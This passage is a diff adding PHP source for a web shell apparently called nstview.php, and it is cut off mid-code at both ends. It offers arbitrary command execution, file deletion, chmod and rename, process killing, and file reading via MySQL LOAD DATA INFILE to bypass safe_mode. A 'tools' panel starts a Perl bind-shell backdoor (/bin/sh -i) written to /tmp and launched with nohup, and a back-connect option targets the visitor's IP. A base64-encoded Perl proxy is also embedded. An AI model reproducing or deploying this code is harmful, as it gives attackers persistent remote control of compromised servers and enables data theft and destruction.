+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>";
+if(@$_POST['sh3']){
+$sh3=$_POST['sh3'];
+echo "<pre>"; print `$sh3`; echo "</pre>";}
+echo $copyr;
+exit;}
+
+if(@$_GET['delfl']){
+@$delfolder=$_GET['delfolder'];
+echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
+(All files must be writable)<br>
+<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
+";
+echo $copyr;
+exit;
+}
+
+
+$mkdir=$_GET['mkdir'];
+if($mkdir){
+print "<br><b>Create Folder in $d :</b><br><br>
+<form method=post>
+New folder name:<br>
+<input name=dir_n size=30>
+</form><br>
+";
+if($_POST['dir_n']){
+mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
+print "<b><font color=green>Directory created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$mkfile=$_GET['mkfile'];
+if($mkfile){
+print "<br><b>Create file in $d :</b><br><br>
+<form method=post>
+File name:<br>
+(example: hello.txt , hello.php)<br>
+<input name=file_n size=30>
+</form><br>
+";
+if($_POST['file_n']){
+$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
+fwrite($fp,"");
+print "<b><font color=green>File created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$ps_table=$_GET['ps_table'];
+if($ps_table){
+
+if($_POST['kill_p']){
+exec("kill -9 ".$_POST['kill_p']);
+}
+
+$str=`ps aux`;
+
+# You can put here preg_match_all for other distrib/os
+preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
+
+
+print "<br><b>PS Table :: Fast kill program<br>
+(p.s: Tested on Linux slackware 10.0)<br>
+<br></b>";
+print "<center><table border=1>";
+for($i=0; $i<count($matches[3]); $i++){
+$expl=explode(" ",$matches[0][$i]);
+print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
+}#end of for
+print "</table></center><br><br>";
+unset($str);
+print $copyr;
+die;
+}#end of ps table
+
+
+$read_file_safe_mode=$_GET['read_file_safe_mode'];
+if($read_file_safe_mode){
+
+if(!isset($_POST['l'])){$_POST['l']="root";}
+
+print "<br>
+Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
+<form method=post>
+<table>
+<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
+<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
+<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
+(example: /etc/hosts)<br>
+<input name=read_file size=45><br>
+<input type=submit value='Show content'>
+</form>
+<br>";
+
+if($_POST['read_file']){
+$read_file=$_POST['read_file'];
+@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
+mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
+mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
+$query = "SELECT * FROM tmp_file";
+$result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
+print "<b>File content</b>:<br><br>";
+for($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);}
+while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach ($line as $key =>$col_value) {
+print htmlspecialchars($col_value)."<br>";}}
+mysql_free_result($result);
+mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+}
+
+
+print $copyr;
+die;
+}#end of read_file_safe_mode
+
+
+# sys
+$wich_f=$_GET['wich_f'];
+$delete=$_GET['delete'];
+$del_f=$_GET['del_f'];
+$chmod=$_GET['chmod'];
+$ccopy_to=$_GET['ccopy_to'];
+
+
+# delete
+if(@$_GET['del_f']){
+if(!isset($delete)){
+print "<font color=red>Delete this file?</font><br>
+<b>$d/$wich_f<br><br></b>
+<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
+";}
+if($delete==1){
+unlink($d."/".$del_f);
+print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
+<br><b> <a href='$php_self?d=$d'># BACK</a>
+";
+}
+echo $copyr;
+exit;
+}
+
+
+# copy to
+if($ccopy_to){
+$wich_f=$_POST['wich_f'];
+$to_f=$_POST['to_f'];
+print "<font color=green>Copy file:<br>
+$d/$ccopy_to</font><br>
+<br>
+<form method=post>
+File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
+To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br>
+<input type=submit value=Copy></form><br><br>
+";
+
+if($to_f){
+@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
+print "<font color=green><b>Copy success!!!</b></font><br>";
+}
+
+echo $copyr;
+exit;
+}
+
+
+# chmod
+if(@$_GET['chmod']){
+$perms = @fileperms($d."/".$wich_f);
+print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
+<br><center>This file chmod is</b> ";
+print perm($perms);
+print "</center>
+<br>";
+$chmd=<<<HTML
+
+<script>
+<!--
+
+function do_chmod(user) {
+        var field4 = user + "4";
+        var field2 = user + "2";
+        var field1 = user + "1";
+        var total = "t_" + user;
+        var symbolic = "sym_" + user;
+        var number = 0;
+        var sym_string = "";
+
+        if (document.chmod[field4].checked == true) { number += 4; }
+        if (document.chmod[field2].checked == true) { number += 2; }
+        if (document.chmod[field1].checked == true) { number += 1; }
+
+        if (document.chmod[field4].checked == true) {
+                sym_string += "r";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field2].checked == true) {
+                sym_string += "w";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field1].checked == true) {
+                sym_string += "x";
+        } else {
+                sym_string += "-";
+        }
+
+        if (number == 0) { number = ""; }
+        document.chmod[total].value = number;
+        document.chmod[symbolic].value = sym_string;
+
+        document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
+        document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
+}
+//-->
+</script>
+
+
+
+<form name="chmod" method=post>
+<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
+        <tr bgcolor="gray">
+                <td align="left"><b>Permission</b></td>
+                <td align="center"><b>Owner</b></td>
+                <td align="center"><b>Group</b></td>
+                <td align="center"><b>Other</b></td>
+                <td bgcolor="#dddddd" rowspan="4"> </td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Read</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Write</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Execute</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Octal:</td>
+                <td align="center"><input type="text" name="t_owner" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_group" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_other" value="" size="1"></td>
+                <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Symbolic:</td>
+                <td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_group" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_other" value="" size="3"></td>
+                <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
+        </tr>
+</table></td></tr></table></p>
+HTML;
+
+print "<center>".$chmd."
+
+<b>$d/$wich_f</b><br><br>
+<input type=submit value=CHMOD></form>
+</center>
+</form>
+";
+$t_total=$_POST['t_total'];
+if($t_total){
+chmod($d."/".$wich_f,$t_total);
+print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
+print "<a href='$php_self?d=$d'># BACK</a><br><br>";
+}
+echo $copyr;
+exit;
+}
+
+# rename
+if(@$_GET['rename']){
+print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$wich_f'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+
+@$rto=$_POST['rto'];
+
+if($rto){
+$fr1=$d."/".$wich_f;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+
+rename($fr1,$to1);
+print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
+
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
+
+}
+
+echo $copyr;
+exit;
+}
+
+
+
+
+if(@$_GET['deldir']){
+@$dir=$_GET['dir'];
+function deldir($dir)
+{
+$handle = @opendir($dir);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$dir/$ff")){
+deldir("$dir/$ff");
+}else{
+@unlink("$dir/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($dir)){
+@$success = true;}
+return @$success;
+}
+$dir=@$dir;
+deldir($dir);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="tools"){
+        # unix
+if($os=="unix"){
+print "
+<center><br>
+<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font>
+<table border=1>
+<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
+<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
+<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
+<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
+<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
+</table>
+</center>
+<br><Br>
+";
+}#end of unix
+
+
+if($_POST['perl_bd']){
+$port=$_POST['port'];
+$perl_bd_scp = "
+use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
+setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
+listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
+open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
+close X;}}";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl /tmp/nst_perl_bd.pl &");
+unlink("/tmp/nst_perl_bd.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &");
+unlink(".nst_bd_tmp/nst_perl_bd.pl");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_bd
+
+if($_POST['perl_proxy']){
+$port=$_POST['port'];
+$perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQ